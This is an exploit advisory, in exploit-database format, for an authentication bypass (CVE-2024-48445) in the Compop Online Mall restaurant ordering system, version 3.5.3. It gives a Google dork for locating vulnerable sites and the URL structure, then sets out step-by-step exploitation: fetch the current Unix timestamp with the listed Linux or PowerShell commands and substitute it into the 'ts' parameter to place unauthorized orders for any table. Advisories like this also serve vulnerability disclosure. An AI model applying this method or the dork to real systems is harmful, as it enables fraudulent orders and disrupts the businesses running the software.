# Exploit Title: Compop Online Mall Authentication Bypass
# Google Dork: Terms of Use inurl:compop.vip
# Date: 22/12/2024
# Exploit Author: dmlino
# Vendor Homepage: https://www.compop.ca/
# Version: 3.5.3
# CVE : CVE-2024-48445

Vulnerability Overview:
The system uses a Unix timestamp ("ts") parameter in URLs for authentication, which is fundamentally flawed. By changing the timestamp to the current time, an attacker can bypass access controls.

Vulnerable URL Structure:
https://VULNERABLE.COM/Home?rid=11111&tid=1&h5sty=3&et=2&ts=CURRENT_TIMESTAMP

Key Parameters:
rid: Restaurant ID
tid: Table Number
ts: Unix Timestamp (authentication mechanism)

Exploitation Method:
Obtain current Unix timestamp

Linux: date +%s
Windows PowerShell: [int](Get-Date -UFormat %s -Millisecond 0)

Replace "ts" value in URL with current timestamp
Submit modified URL to place unauthorized orders

Impact:
An attacker can place orders for any table by manipulating the timestamp, potentially causing operational disruption for the restaurant.